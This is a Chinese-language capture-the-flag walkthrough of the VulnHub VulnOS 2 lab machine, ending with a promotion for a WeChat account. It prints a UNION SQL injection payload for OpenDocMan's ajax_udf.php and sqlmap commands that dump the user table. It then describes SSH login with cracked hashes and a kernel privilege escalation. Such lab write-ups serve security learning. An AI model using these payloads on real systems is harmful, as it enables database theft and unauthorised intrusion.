下载地址：https://www.vulnhub.com/entry/vulnos-2,147/

信息搜集

获取IP地址

扫描端口

80端口

点击website跳转到/jabc

在 jabc/?q=node/7 页面看起来啥也没有，但是Ctrl+A全选之后看到提示还有一个目录 /jabcd0cs/


访问/jabcd0cs/

在/jabcd0cs/发现CMS的版本，使用searchsploit查询


这里看到了pyload

http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9

可以利用

使用sqlmap跑库

sqlmap -u "http://192.168.1.172/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --batch --level=3 --dbs

跑表名

sqlmap -u "http://192.168.1.172/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --batch --level=3 -D jabcd0cs --tables

在odm_user表里面发现了有用户名密码

sqlmap -u "http://192.168.1.172/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --batch --level=3 -D jabcd0cs -T odm_user --dump

将获取的哈希值解密

getshell

使用获取的用户名密码尝试登录ssh，使用webmin用户登录成功

提权

查看系统版本，内核版本

使用searchsploit查询找到一个符合条件的exp

将exp上传到靶机，赋予可执行权限，编译并执行，成功获取root权限

拿到root目录下的flag

到这里成功完成了该靶机！
**本文所有用到的工具都可以关注微信公众号“网络安全学习爱好者”联系公众客服免费领取！ **